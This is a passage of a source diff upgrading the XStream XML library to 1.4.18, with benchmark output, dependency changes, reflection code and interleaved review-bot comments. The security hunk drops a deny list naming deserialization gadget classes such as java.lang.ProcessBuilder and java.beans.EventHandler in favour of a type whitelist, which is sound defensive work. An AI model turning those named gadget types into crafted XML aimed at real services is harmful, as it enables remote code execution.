754593.348 ± 16963.908 ns/op +ParserBenchmark.parseManyChildren kXML2 avgt 15 855787.083 ± 2364.443 ns/op +ParserBenchmark.parseManyChildren JDKStax avgt 15 885917.070 ± 27740.420 ns/op +ParserBenchmark.parseManyChildren Woodstox avgt 15 630843.461 ± 16713.507 ns/op +ParserBenchmark.parseManyChildren BEAStax avgt 15 667706.032 ± 11089.959 ns/op +ParserBenchmark.parseManyChildren DOM avgt 15 59894584.643 ± 305491.167 ns/op +ParserBenchmark.parseManyChildren DOM4J avgt 15 79125701.566 ± 1579465.065 ns/op +ParserBenchmark.parseManyChildren JDom avgt 15 6887733.303 ± 102619.220 ns/op +ParserBenchmark.parseManyChildren JDom2 avgt 15 9876176.832 ± 48837.176 ns/op +ParserBenchmark.parseManyChildren Xom avgt 15 34141742.595 ± 475598.891 ns/op +ParserBenchmark.parseManyChildren Binary avgt 15 405493.660 ± 4239.044 ns/op +ParserBenchmark.parseManyChildren Jettison avgt 15 601803.834 ± 2160.122 ns/op +ParserBenchmark.parseNestedElements MXParser avgt 15 13287597.794 ± 343543.709 ns/op +ParserBenchmark.parseNestedElements Xpp3 avgt 15 13056389.184 ± 132562.496 ns/op +ParserBenchmark.parseNestedElements kXML2 avgt 15 36819091.742 ± 300358.967 ns/op +ParserBenchmark.parseNestedElements JDKStax avgt 15 868883.676 ± 15697.149 ns/op +ParserBenchmark.parseNestedElements Woodstox avgt 15 835465.393 ± 19498.030 ns/op +ParserBenchmark.parseNestedElements BEAStax avgt 15 603986.803 ± 2529.449 ns/op +ParserBenchmark.parseNestedElements DOM avgt 15 5382390.375 ± 82043.169 ns/op +ParserBenchmark.parseNestedElements DOM4J avgt 15 5372787.809 ± 127206.586 ns/op +ParserBenchmark.parseNestedElements JDom avgt 15 13598531.633 ± 96889.652 ns/op +ParserBenchmark.parseNestedElements JDom2 avgt 15 12503949.903 ± 502488.951 ns/op +ParserBenchmark.parseNestedElements Xom avgt 15 5425911.128 ± 23777.824 ns/op +ParserBenchmark.parseNestedElements Binary avgt 15 284620.649 ± 1734.011 ns/op +ParserBenchmark.parseNestedElements Jettison avgt 15 678187.271 ± 19300.714 ns/op 
diff --git a/xstream-jmh/src/reference/stringConverter.txt b/xstream-jmh/src/reference/stringConverter.txt index 009eb18fed13bd7d3ec4f68960647f4a1bbadcf8..0f35a4bb2dc8828d5b0fad8f0518a4b81712bd29 100644 --- a/xstream-jmh/src/reference/stringConverter.txt +++ b/xstream-jmh/src/reference/stringConverter.txt @@ -1,7 +1,7 @@ Benchmark Mode Cnt Score Error Units -StringConverterBenchmark.intern avgt 16 12528650.663 ± 56567.910 ns/op -StringConverterBenchmark.limitedConcurrentMap avgt 16 10583918.884 ± 212931.336 ns/op -StringConverterBenchmark.limitedSynchronizedWeakCache avgt 16 11104926.490 ± 567963.839 ns/op -StringConverterBenchmark.nonCaching avgt 16 9381243.000 ± 11471.064 ns/op -StringConverterBenchmark.unlimitedConcurrentMap avgt 16 11762308.937 ± 510331.968 ns/op -StringConverterBenchmark.unlimitedSynchronizedWeakCache avgt 16 11092087.483 ± 546550.827 ns/op +StringConverterBenchmark.intern avgt 16 14262839.973 ± 1233510.125 ns/op +StringConverterBenchmark.limitedConcurrentMap avgt 16 10538757.220 ± 20805.104 ns/op +StringConverterBenchmark.limitedSynchronizedWeakCache avgt 16 11298773.753 ± 13335.307 ns/op +StringConverterBenchmark.nonCaching avgt 16 9796296.611 ± 668511.980 ns/op +StringConverterBenchmark.unlimitedConcurrentMap avgt 16 11252298.498 ± 215637.373 ns/op +StringConverterBenchmark.unlimitedSynchronizedWeakCache avgt 16 11279714.685 ± 22069.538 ns/op diff --git a/xstream/pom.xml b/xstream/pom.xml index 1679ded635517e260eea67f10dc3da785311a62e..0df977bf20f9b37b1c7997c1cc68159daccac8af 100644 --- a/xstream/pom.xml +++ b/xstream/pom.xml 
@@ -1,7 +1,7 @@ <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"> <!-- Copyright (C) 2006 Joe Walnes. - Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019 XStream committers. + Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019, 2020, 2021 XStream committers. All rights reserved. The software in this package is published under the terms of the BSD @@ -14,7 +14,7 @@ <parent> <groupId>com.thoughtworks.xstream</groupId> <artifactId>xstream-parent</artifactId> - <version>1.4.15</version> + <version>1.4.18</version> </parent> <artifactId>xstream</artifactId> <packaging>jar</packaging> @@ -45,14 +45,14 @@ </dependency> <dependency> - <groupId>stax</groupId> - <artifactId>stax</artifactId> + <groupId>org.codehaus.woodstox</groupId> + <artifactId>wstx-asl</artifactId> <optional>true</optional> </dependency> <dependency> - <groupId>org.codehaus.woodstox</groupId> - <artifactId>wstx-asl</artifactId> + <groupId>stax</groupId> + <artifactId>stax</artifactId> <optional>true</optional> </dependency> @@ -69,8 +69,8 @@ </dependency> <dependency> - <groupId>xmlpull</groupId> - <artifactId>xmlpull</artifactId> + <groupId>io.github.x-stream</groupId> + <artifactId>mxparser</artifactId> </dependency> <dependency> @@ -90,6 +90,7 @@ <dependency> <groupId>xpp3</groupId> <artifactId>xpp3_min</artifactId> + <optional>true</optional> </dependency> <dependency> @@ -640,6 +641,7 @@ <bundle.import.package> org.xmlpull.mxp1;resolution:=optional, org.xmlpull.v1;resolution:=optional, + io.github.xstream.mxparser.*;resolution:=optional, com.ibm.*;resolution:=optional, com.sun.*;resolution:=optional, javax.*;resolution:=optional, 
diff --git a/xstream/src/java/com/thoughtworks/xstream/XStream.java b/xstream/src/java/com/thoughtworks/xstream/XStream.java index 8415da259d562765c94cf08b8ef95ac3952a367f..7d90dc7f9670cda8c64bed34fc2f56ecf1299a44 100644 --- a/xstream/src/java/com/thoughtworks/xstream/XStream.java +++ b/xstream/src/java/com/thoughtworks/xstream/XStream.java @@ -1,6 +1,6 @@ /* * Copyright (C) 2003, 2004, 2005, 2006 Joe Walnes. - * Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2020 XStream Committers. + * Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2020, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -36,7 +36,6 @@ import java.net.URL; import java.nio.charset.Charset; import java.text.DecimalFormatSymbols; import java.util.ArrayList; -import java.util.Arrays; import java.util.BitSet; import java.util.Calendar; import java.util.Collection; @@ -318,9 +317,6 @@ public class XStream { private SecurityMapper securityMapper; private AnnotationConfiguration annotationConfiguration; - private transient boolean securityInitialized; - private transient boolean securityWarningGiven; - public static final int NO_REFERENCES = 1001; public static final int ID_REFERENCES = 1002; public static final int XPATH_RELATIVE_REFERENCES = 1003; @@ -335,9 +331,6 @@ public class XStream { private static final String ANNOTATION_MAPPER_TYPE = "com.thoughtworks.xstream.mapper.AnnotationMapper"; private static final Pattern IGNORE_ALL = Pattern.compile(".*"); - private static final Pattern LAZY_ITERATORS = Pattern.compile(".*\\$LazyIterator"); - private static final Pattern JAVAX_CRYPTO = Pattern.compile("javax\\.crypto\\..*"); - private static final Pattern JAXWS_FILE_STREAM = Pattern.compile(".*\\.ReadAllStream\\$FileStream"); /** * Constructs a default XStream. 
@@ -622,19 +615,19 @@ public class XStream { elementIgnoringMapper = (ElementIgnoringMapper)this.mapper.lookupMapperOfType(ElementIgnoringMapper.class); fieldAliasingMapper = (FieldAliasingMapper)this.mapper.lookupMapperOfType(FieldAliasingMapper.class); attributeMapper = (AttributeMapper)this.mapper.lookupMapperOfType(AttributeMapper.class); - attributeAliasingMapper = (AttributeAliasingMapper)this.mapper - .lookupMapperOfType(AttributeAliasingMapper.class); - systemAttributeAliasingMapper = (SystemAttributeAliasingMapper)this.mapper - .lookupMapperOfType(SystemAttributeAliasingMapper.class); - implicitCollectionMapper = (ImplicitCollectionMapper)this.mapper - .lookupMapperOfType(ImplicitCollectionMapper.class); - defaultImplementationsMapper = (DefaultImplementationsMapper)this.mapper - .lookupMapperOfType(DefaultImplementationsMapper.class); + attributeAliasingMapper = (AttributeAliasingMapper)this.mapper.lookupMapperOfType( + AttributeAliasingMapper.class); + systemAttributeAliasingMapper = (SystemAttributeAliasingMapper)this.mapper.lookupMapperOfType( + SystemAttributeAliasingMapper.class); + implicitCollectionMapper = (ImplicitCollectionMapper)this.mapper.lookupMapperOfType( + ImplicitCollectionMapper.class); + defaultImplementationsMapper = (DefaultImplementationsMapper)this.mapper.lookupMapperOfType( + DefaultImplementationsMapper.class); immutableTypesMapper = (ImmutableTypesMapper)this.mapper.lookupMapperOfType(ImmutableTypesMapper.class); localConversionMapper = (LocalConversionMapper)this.mapper.lookupMapperOfType(LocalConversionMapper.class); securityMapper = (SecurityMapper)this.mapper.lookupMapperOfType(SecurityMapper.class); - annotationConfiguration = (AnnotationConfiguration)this.mapper - .lookupMapperOfType(AnnotationConfiguration.class); + annotationConfiguration = (AnnotationConfiguration)this.mapper.lookupMapperOfType( + AnnotationConfiguration.class); } protected void setupSecurity() { 
@@ -642,113 +635,108 @@ public class XStream { return; } - addPermission(AnyTypePermission.ANY); - denyTypes(new String[]{ - "java.beans.EventHandler", // - "java.lang.ProcessBuilder", // - "javax.imageio.ImageIO$ContainsFilter", // - "jdk.nashorn.internal.objects.NativeString" }); - denyTypesByRegExp(new Pattern[]{LAZY_ITERATORS, JAVAX_CRYPTO, JAXWS_FILE_STREAM}); - allowTypeHierarchy(Exception.class); - securityInitialized = false; + addPermission(NoTypePermission.NONE); + addPermission(NullPermission.NULL); + addPermission(PrimitiveTypePermission.PRIMITIVES); + addPermission(ArrayTypePermission.ARRAYS); + addPermission(InterfaceTypePermission.INTERFACES); + allowTypeHierarchy(Calendar.class); + allowTypeHierarchy(Collection.class); + allowTypeHierarchy(Map.class); + allowTypeHierarchy(Map.Entry.class); + allowTypeHierarchy(Member.class); + allowTypeHierarchy(Number.class); + allowTypeHierarchy(Throwable.class); + allowTypeHierarchy(TimeZone.class); + + Class type = JVM.loadClassForName("java.lang.Enum"); + if (type != null) { + allowTypeHierarchy(type); + } + type = JVM.loadClassForName("java.nio.file.Path"); + if (type != null) { + allowTypeHierarchy(type); + } + + final Set types = new HashSet(); + types.add(BitSet.class); + types.add(Charset.class); + types.add(Class.class); + types.add(Currency.class); + types.add(Date.class); + types.add(DecimalFormatSymbols.class); + types.add(File.class); + types.add(Locale.class); + types.add(Object.class); + types.add(Pattern.class); + types.add(StackTraceElement.class); + types.add(String.class); + types.add(StringBuffer.class); + types.add(JVM.loadClassForName("java.lang.StringBuilder")); + types.add(URL.class); + types.add(URI.class); + types.add(JVM.loadClassForName("java.util.UUID")); + if (JVM.isSQLAvailable()) { + types.add(JVM.loadClassForName("java.sql.Timestamp")); + types.add(JVM.loadClassForName("java.sql.Time")); + types.add(JVM.loadClassForName("java.sql.Date")); + } + if (JVM.isVersion(8)) { + 
allowTypeHierarchy(JVM.loadClassForName("java.time.Clock")); + types.add(JVM.loadClassForName("java.time.Duration")); + types.add(JVM.loadClassForName("java.time.Instant")); + types.add(JVM.loadClassForName("java.time.LocalDate")); + types.add(JVM.loadClassForName("java.time.LocalDateTime")); + types.add(JVM.loadClassForName("java.time.LocalTime")); + types.add(JVM.loadClassForName("java.time.MonthDay")); + types.add(JVM.loadClassForName("java.time.OffsetDateTime")); + types.add(JVM.loadClassForName("java.time.OffsetTime")); + types.add(JVM.loadClassForName("java.time.Period")); + types.add(JVM.loadClassForName("java.time.Ser")); + types.add(JVM.loadClassForName("java.time.Year")); + types.add(JVM.loadClassForName("java.time.YearMonth")); + types.add(JVM.loadClassForName("java.time.ZonedDateTime")); + allowTypeHierarchy(JVM.loadClassForName("java.time.ZoneId")); + types.add(JVM.loadClassForName("java.time.chrono.HijrahDate")); + types.add(JVM.loadClassForName("java.time.chrono.JapaneseDate")); + types.add(JVM.loadClassForName("java.time.chrono.JapaneseEra")); + types.add(JVM.loadClassForName("java.time.chrono.MinguoDate")); + types.add(JVM.loadClassForName("java.time.chrono.ThaiBuddhistDate")); + types.add(JVM.loadClassForName("java.time.chrono.Ser")); + allowTypeHierarchy(JVM.loadClassForName("java.time.chrono.Chronology")); + types.add(JVM.loadClassForName("java.time.temporal.ValueRange")); + types.add(JVM.loadClassForName("java.time.temporal.WeekFields")); + } + types.remove(null); + + final Iterator iter = types.iterator(); + final Class[] classes = new Class[types.size()]; + for (int i = 0; i < classes.length; ++i) { + classes[i] = (Class)iter.next(); + } + allowTypes(classes); + } + + private void denyTypeHierarchyDynamically(String className) { + Class type = JVM.loadClassForName(className); + if (type != null) { + denyTypeHierarchy(type); + } } /** * Setup the security framework of a XStream instance. 
* <p> - * This method is a pure helper method for XStream 1.4.x. It initializes an XStream instance with a white list of - * well-known and simply types of the Java runtime as it is done in XStream 1.5.x by default. This method will do - * therefore nothing in XStream 1.5. + * This method was a pure helper method for XStream 1.4.10 to 1.4.17. It initialized an XStream instance with a + * whitelist of well-known and simply types of the Java runtime as it is done in XStream 1.4.18 by default. This + * method will do therefore nothing in XStream 1.4.18 or higher. * </p> * * @param xstream * @since 1.4.10 + * @deprecated As of 1.4.18 */ public static void setupDefaultSecurity(final XStream xstream) { - if (!xstream.securityInitialized) { - xstream.addPermission(NoTypePermission.NONE); - xstream.addPermission(NullPermission.NULL); - xstream.addPermission(PrimitiveTypePermission.PRIMITIVES); - xstream.addPermission(ArrayTypePermission.ARRAYS); - xstream.addPermission(InterfaceTypePermission.INTERFACES); - xstream.allowTypeHierarchy(Calendar.class); - xstream.allowTypeHierarchy(Collection.class); - xstream.allowTypeHierarchy(Map.class); - xstream.allowTypeHierarchy(Map.Entry.class); - xstream.allowTypeHierarchy(Member.class); - xstream.allowTypeHierarchy(Number.class); - xstream.allowTypeHierarchy(Throwable.class); - xstream.allowTypeHierarchy(TimeZone.class); - - Class type = JVM.loadClassForName("java.lang.Enum"); - if (type != null) { - xstream.allowTypeHierarchy(type); - } - type = JVM.loadClassForName("java.nio.file.Path"); - if (type != null) { - xstream.allowTypeHierarchy(type); - } - - final Set types = new HashSet(); - types.add(BitSet.class); - types.add(Charset.class); - types.add(Class.class); - types.add(Currency.class); - types.add(Date.class); - types.add(DecimalFormatSymbols.class); - types.add(File.class); - types.add(Locale.class); - types.add(Object.class); - types.add(Pattern.class); - types.add(StackTraceElement.class); - types.add(String.class); - 
types.add(StringBuffer.class); - types.add(JVM.loadClassForName("java.lang.StringBuilder")); - types.add(URL.class); - types.add(URI.class); - types.add(JVM.loadClassForName("java.util.UUID")); - if (JVM.isSQLAvailable()) { - types.add(JVM.loadClassForName("java.sql.Timestamp")); - types.add(JVM.loadClassForName("java.sql.Time")); - types.add(JVM.loadClassForName("java.sql.Date")); - } - if (JVM.isVersion(8)) { - xstream.allowTypeHierarchy(JVM.loadClassForName("java.time.Clock")); - types.add(JVM.loadClassForName("java.time.Duration")); - types.add(JVM.loadClassForName("java.time.Instant")); - types.add(JVM.loadClassForName("java.time.LocalDate")); - types.add(JVM.loadClassForName("java.time.LocalDateTime")); - types.add(JVM.loadClassForName("java.time.LocalTime")); - types.add(JVM.loadClassForName("java.time.MonthDay")); - types.add(JVM.loadClassForName("java.time.OffsetDateTime")); - types.add(JVM.loadClassForName("java.time.OffsetTime")); - types.add(JVM.loadClassForName("java.time.Period")); - types.add(JVM.loadClassForName("java.time.Ser")); - types.add(JVM.loadClassForName("java.time.Year")); - types.add(JVM.loadClassForName("java.time.YearMonth")); - types.add(JVM.loadClassForName("java.time.ZonedDateTime")); - xstream.allowTypeHierarchy(JVM.loadClassForName("java.time.ZoneId")); - types.add(JVM.loadClassForName("java.time.chrono.HijrahDate")); - types.add(JVM.loadClassForName("java.time.chrono.JapaneseDate")); - types.add(JVM.loadClassForName("java.time.chrono.JapaneseEra")); - types.add(JVM.loadClassForName("java.time.chrono.MinguoDate")); - types.add(JVM.loadClassForName("java.time.chrono.ThaiBuddhistDate")); - types.add(JVM.loadClassForName("java.time.chrono.Ser")); - xstream.allowTypeHierarchy(JVM.loadClassForName("java.time.chrono.Chronology")); - types.add(JVM.loadClassForName("java.time.temporal.ValueRange")); - types.add(JVM.loadClassForName("java.time.temporal.WeekFields")); - } - types.remove(null); - - final Iterator iter = types.iterator(); - 
final Class[] classes = new Class[types.size()]; - for (int i = 0; i < classes.length; ++i) { - classes[i] = (Class)iter.next(); - } - xstream.allowTypes(classes); - } else { - throw new IllegalArgumentException("Security framework of XStream instance already initialized"); - } } protected void setupAliases() { @@ -1400,14 +1388,7 @@ public class XStream { */ public Object unmarshal(HierarchicalStreamReader reader, Object root, DataHolder dataHolder) { try { - if (!securityInitialized && !securityWarningGiven) { - securityWarningGiven = true; - System.err - .println( - "Security framework of XStream not explicitly initialized, using predefined black list on your own risk."); - } return marshallingStrategy.unmarshal(root, reader, dataHolder, converterLookup, mapper); - } catch (ConversionException e) { Package pkg = getClass().getPackage(); String version = pkg != null ? pkg.getImplementationVersion() : null; @@ -2235,7 +2216,6 @@ public class XStream { */ public void addPermission(TypePermission permission) { if (securityMapper != null) { - securityInitialized |= permission.equals(NoTypePermission.NONE) || permission.equals(AnyTypePermission.ANY); securityMapper.addPermission(permission); } } @@ -2390,11 +2370,6 @@ public class XStream { denyPermission(new WildcardTypePermission(patterns)); } - private Object readResolve() { - securityWarningGiven = true; - return this; - } - /** * @deprecated As of 1.3, use {@link com.thoughtworks.xstream.InitializationException} instead */ diff --git a/xstream/src/java/com/thoughtworks/xstream/XStreamer.java b/xstream/src/java/com/thoughtworks/xstream/XStreamer.java index a4245a1f28a9b942b174e94a048648366ee2af71..2d6ffc4ac90472291c92d3a8d6c795202229c987 100644 --- a/xstream/src/java/com/thoughtworks/xstream/XStreamer.java +++ b/xstream/src/java/com/thoughtworks/xstream/XStreamer.java 
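Review bot: The `JVM.isVersion(8)` block feeds `JVM.loadClassForName("java.time.Clock")`, `"java.time.ZoneId"` and `"java.time.chrono.Chronology"` straight into `allowTypeHierarchy`, while the `java.lang.Enum` and `java.nio.file.Path` lookups a few lines up are null-guarded and the `types` set is scrubbed with `types.remove(null)`; on a runtime where one of those three lookups yields null the permission would be built around a null type. The new private `denyTypeHierarchyDynamically` wraps exactly that guard but has no caller visible in this diff, so either use it (or an allow-side twin `allowTypeHierarchyDynamically`) for those three calls or drop it. The hierarchy permissions also deserve a comment, because `allowTypeHierarchy(Collection.class)`, `Map.class`, `Throwable.class` and `Member.class` admit every subtype found on the classpath, not only JDK classes: `// NOTE: hierarchy permissions accept any implementation on the classpath, 3rd-party ones included`. `setupSecurity` opens before this hunk.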
@@ -1,5 +1,5 @@ /* - * Copyright (C) 2006, 2007, 2014, 2016, 2017, 2018 XStream Committers. + * Copyright (C) 2006, 2007, 2014, 2016, 2017, 2018, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -107,7 +107,6 @@ public class XStreamer { public void toXML(final XStream xstream, final Object obj, final Writer out) throws IOException { final XStream outer = new XStream(); - XStream.setupDefaultSecurity(outer); final ObjectOutputStream oos = outer.createObjectOutputStream(out); try { oos.writeObject(xstream); @@ -268,7 +267,6 @@ public class XStreamer { public Object fromXML(final HierarchicalStreamDriver driver, final Reader xml, final TypePermission[] permissions) throws IOException, ClassNotFoundException { final XStream outer = new XStream(driver); - XStream.setupDefaultSecurity(outer); for(int i = 0; i < permissions.length; ++i) { outer.addPermission(permissions[i]); } diff --git a/xstream/src/java/com/thoughtworks/xstream/converters/reflection/PureJavaReflectionProvider.java b/xstream/src/java/com/thoughtworks/xstream/converters/reflection/PureJavaReflectionProvider.java index 3a52c453414e3f2ba735510633594920257246bf..6a88fb2ffbf625e2c2ccfd33a25d3b35b55fdcf0 100644 --- a/xstream/src/java/com/thoughtworks/xstream/converters/reflection/PureJavaReflectionProvider.java +++ b/xstream/src/java/com/thoughtworks/xstream/converters/reflection/PureJavaReflectionProvider.java @@ -1,6 +1,6 @@ /* * Copyright (C) 2004, 2005, 2006 Joe Walnes. - * Copyright (C) 2006, 2007, 2009, 2011, 2013, 2016, 2018, 2020 XStream Committers. + * Copyright (C) 2006, 2007, 2009, 2011, 2013, 2016, 2018, 2020, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD 
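Review bot: With the explicit `XStream.setupDefaultSecurity(outer)` calls gone, nothing at these two call sites shows that `outer` is still restricted; a reader of `fromXML` has to know that the default constructor now installs the whitelist and that the caller-supplied `permissions` only widen it. Suggest a comment before the loop, `// XStream() applies the default whitelist since 1.4.18; permissions only add to it`, and the same note in `toXML` above `createObjectOutputStream`. Both methods continue outside their hunks.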
@@ -27,11 +27,16 @@ import java.io.Serializable; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationTargetException; +import java.lang.reflect.Method; import java.lang.reflect.Modifier; import java.util.Iterator; import java.util.Map; import java.util.WeakHashMap; +import com.thoughtworks.xstream.converters.ConversionException; +import com.thoughtworks.xstream.converters.ErrorWritingException; +import com.thoughtworks.xstream.core.util.Fields; + /** * Pure Java ObjectFactory that instantiates objects using standard Java reflection, however the types of objects that @@ -50,6 +55,7 @@ import java.util.WeakHashMap; */ public class PureJavaReflectionProvider implements ReflectionProvider { + private transient Map objectStreamClassCache; private transient Map serializedDataCache; protected FieldDictionary fieldDictionary; @@ -104,8 +110,19 @@ public class PureJavaReflectionProvider implements ReflectionProvider { private Object instantiateUsingSerialization(final Class type) { ObjectAccessException oaex = null; try { + if (Reflections.newInstance != null) { + synchronized (objectStreamClassCache) { + ObjectStreamClass osClass = (ObjectStreamClass)objectStreamClassCache.get(type); + if (osClass == null) { + osClass = ObjectStreamClass.lookup(type); + objectStreamClassCache.put(type, osClass); + } + return Reflections.newInstance.invoke(osClass, new Object[0]); + } + } + byte[] data; synchronized (serializedDataCache) { - byte[] data = (byte[])serializedDataCache.get(type); + data = (byte[])serializedDataCache.get(type); if (data == null) { ByteArrayOutputStream bytes = new ByteArrayOutputStream(); DataOutputStream stream = new DataOutputStream(bytes); 
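Review bot: The newly imported `ConversionException`, `ErrorWritingException` and `Fields` are not referenced by any added line in this file's hunks, so they look like leftovers and will be reported as unused imports. Drop the three `import com.thoughtworks.xstream...` lines unless code outside the diff relies on them, which nothing visible suggests.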
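Review bot: `objectStreamClassCache` is a `WeakHashMap` keyed by `type`, but the cached `ObjectStreamClass` strongly references that same class (its `forClass()`), so the value pins the key and entries are never released — unlike `serializedDataCache`, whose `byte[]` values hold no such reference. The JDK keeps its own descriptor cache behind `ObjectStreamClass.lookup`, so the map can go entirely: `return Reflections.newInstance.invoke(ObjectStreamClass.lookup(type), new Object[0]);`. Note also that `lookup` returns null for non-`Serializable` types, which would surface as a `NullPointerException` from `invoke`; presumably only serializable types reach this method, but a guard or a one-line comment stating that precondition would make it explicit. `instantiateUsingSerialization` continues past this hunk.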
@@ -122,18 +139,25 @@ public class PureJavaReflectionProvider implements ReflectionProvider { data = bytes.toByteArray(); serializedDataCache.put(type, data); } - - ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data)) { - protected Class resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException { - return Class.forName(desc.getName(), false, type.getClassLoader()); - } - }; - return in.readObject(); } - } catch (IOException e) { + final ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data)) { + protected Class resolveClass(final ObjectStreamClass desc) throws ClassNotFoundException { + return Class.forName(desc.getName(), false, type.getClassLoader()); + } + }; + return in.readObject(); + } catch (final ObjectAccessException e) { + oaex = e; + } catch (final IOException e) { oaex = new ObjectAccessException("Cannot create type by JDK serialization", e); } catch (ClassNotFoundException e) { oaex = new ObjectAccessException("Cannot find class", e); + } catch (IllegalAccessException e) { + oaex = new ObjectAccessException("Cannot create type by JDK object stream data", e); + } catch (IllegalArgumentException e) { + oaex = new ObjectAccessException("Cannot create type by JDK object stream data", e); + } catch (InvocationTargetException e) { + oaex = new ObjectAccessException("Cannot create type by JDK object stream data", e); } oaex.add("construction-type", type.getName()); throw oaex; 
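Review bot: The `InvocationTargetException` branch wraps the reflective wrapper rather than the exception the constructor actually threw, so the `ObjectAccessException` carries the real cause one level down and its message is not visible in the usual cause chain; use `e.getTargetException()` instead: `oaex = new ObjectAccessException("Cannot create type by JDK object stream data", e.getTargetException());`. The three new catch clauses also repeat the same message literal, which could live in one local, but that is cosmetic. `instantiateUsingSerialization` begins before this hunk.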
@@ -207,6 +231,23 @@ public class PureJavaReflectionProvider implements ReflectionProvider { } protected void init() { + objectStreamClassCache = new WeakHashMap(); serializedDataCache = new WeakHashMap(); } + + private static class Reflections { + private final static Method newInstance; + static { + Method method = null; + try { + method = ObjectStreamClass.class.getDeclaredMethod("newInstance", new Class[0]); + method.setAccessible(true); + } catch (final NoSuchMethodException e) { + // not available + } catch (final SecurityException e) { + // not available + } + newInstance = method; + } + } } diff --git a/xstream/src/java/com/thoughtworks/xstream/io/xml/MXParserDomDriver.java b/xstream/src/java/com/thoughtworks/xstream/io/xml/MXParserDomDriver.java new file mode 100644 index 0000000000000000000000000000000000000000..da75574561d5b3b3ae34890f76f2c41f0484d883 --- /dev/null +++ b/xstream/src/java/com/thoughtworks/xstream/io/xml/MXParserDomDriver.java 
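Review bot: `Reflections` only catches `NoSuchMethodException` and `SecurityException` around `method.setAccessible(true)`, but on Java 16+ (and any JDK 9+ run with `--illegal-access=deny`) opening a package-private `java.io` method fails with `java.lang.reflect.InaccessibleObjectException`, which extends `RuntimeException`, not `SecurityException`; the static initializer then throws, the class dies with `ExceptionInInitializerError`, and every later `Reflections.newInstance` read becomes a `NoClassDefFoundError` instead of the intended fall-back to the serialization path. Add `catch (final RuntimeException e) { // e.g. InaccessibleObjectException on Java 9+, fall back to JDK serialization }` after the `SecurityException` clause. A one-line comment on the field would also help: `// package-private ObjectStreamClass.newInstance, presumably avoids the ObjectInputStream round trip; null when not accessible`.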
@@ -0,0 +1,53 @@
+/*
+ * Copyright (C) 2021 XStream Committers.
+ * All rights reserved.
+ *
+ * The software in this package is published under the terms of the BSD
+ * style license a copy of which has been included with this distribution in
+ * the LICENSE.txt file.
+ *
+ * Created on 02. January 2021 by Joerg Schaible
+ */
+package com.thoughtworks.xstream.io.xml;
+
+import com.thoughtworks.xstream.io.HierarchicalStreamDriver;
+import com.thoughtworks.xstream.io.naming.NameCoder;
+
+import io.github.xstream.mxparser.MXParser;
+
+import org.xmlpull.v1.XmlPullParser;
+
+/**
+ * A {@link HierarchicalStreamDriver} for XPP DOM using the MXParser fork.
+ *
+ * @author Jörg Schaible
+ * @since 1.4.16
+ */
+public class MXParserDomDriver extends AbstractXppDomDriver {
+
+ /**
+ * Construct an MXParserDomDriver.
+ *
+ * @since 1.4.16
+ */
+ public MXParserDomDriver() {
+ super(new XmlFriendlyNameCoder());
+ }
+
+ /**
+ * Construct an Xpp3DomDriver.
+ *
+ * @param nameCoder the replacer for XML friendly names
+ * @since 1.4
+ */
+ public MXParserDomDriver(NameCoder nameCoder) {
+ super(nameCoder);
+ }
+
+ /**
+ * {@inheritDoc}
+ */
+ protected XmlPullParser createParser() {
+ return new MXParser();
+ }
+}
diff --git a/xstream/src/java/com/thoughtworks/xstream/io/xml/MXParserDriver.java b/xstream/src/java/com/thoughtworks/xstream/io/xml/MXParserDriver.java
new file mode 100644
index 0000000000000000000000000000000000000000..3ecf31244146775515b2e2e8eba384e808109120
--- /dev/null
+++ b/xstream/src/java/com/thoughtworks/xstream/io/xml/MXParserDriver.java
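Review bot: The Javadoc of the `NameCoder` constructor was copied from the Xpp3 driver: it reads `Construct an Xpp3DomDriver.` and `@since 1.4`, both wrong for a class whose own header says `@since 1.4.16`. Change the two lines to `* Construct an MXParserDomDriver.` and `* @since 1.4.16`.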
@@ -0,0 +1,55 @@
+/*
+ * Copyright (C) 2021 XStream Committers.
+ * All rights reserved.
+ *
+ * The software in this package is published under the terms of the BSD
+ * style license a copy of which has been included with this distribution in
+ * the LICENSE.txt file.
+ *
+ * Created on 2. January 2021 by Joerg Schaible
+ */
+package com.thoughtworks.xstream.io.xml;
+
+
+import com.thoughtworks.xstream.io.HierarchicalStreamDriver;
+import com.thoughtworks.xstream.io.naming.NameCoder;
+
+import io.github.xstream.mxparser.MXParser;
+
+import org.xmlpull.v1.XmlPullParser;
+
+
+/**
+ * A {@link HierarchicalStreamDriver} using the MXParser fork.
+ *
+ * @author Jörg Schaible
+ * @since 1.4.16
+ */
+public class MXParserDriver extends AbstractXppDriver {
+
+ /**
+ * Construct an MXParserDriver.
+ *
+ * @since 1.4.16
+ */
+ public MXParserDriver() {
+ super(new XmlFriendlyNameCoder());
+ }
+
+ /**
+ * Construct an Xpp3Driver.
+ *
+ * @param nameCoder the replacer for XML friendly names
+ * @since 1.4.16
+ */
+ public MXParserDriver(NameCoder nameCoder) {
+ super(nameCoder);
+ }
+
+ /**
+ * {@inheritDoc}
+ */
+ protected XmlPullParser createParser() {
+ return new MXParser();
+ }
+}
diff --git a/xstream/src/java/com/thoughtworks/xstream/io/xml/XmlFriendlyNameCoder.java b/xstream/src/java/com/thoughtworks/xstream/io/xml/XmlFriendlyNameCoder.java
index b1c6f51a92801fe7481eb18cfd9f83f10e22f829..94991221f90b4c18bd29fe06d3d500dd074f32db 100644
--- a/xstream/src/java/com/thoughtworks/xstream/io/xml/XmlFriendlyNameCoder.java
+++ b/xstream/src/java/com/thoughtworks/xstream/io/xml/XmlFriendlyNameCoder.java
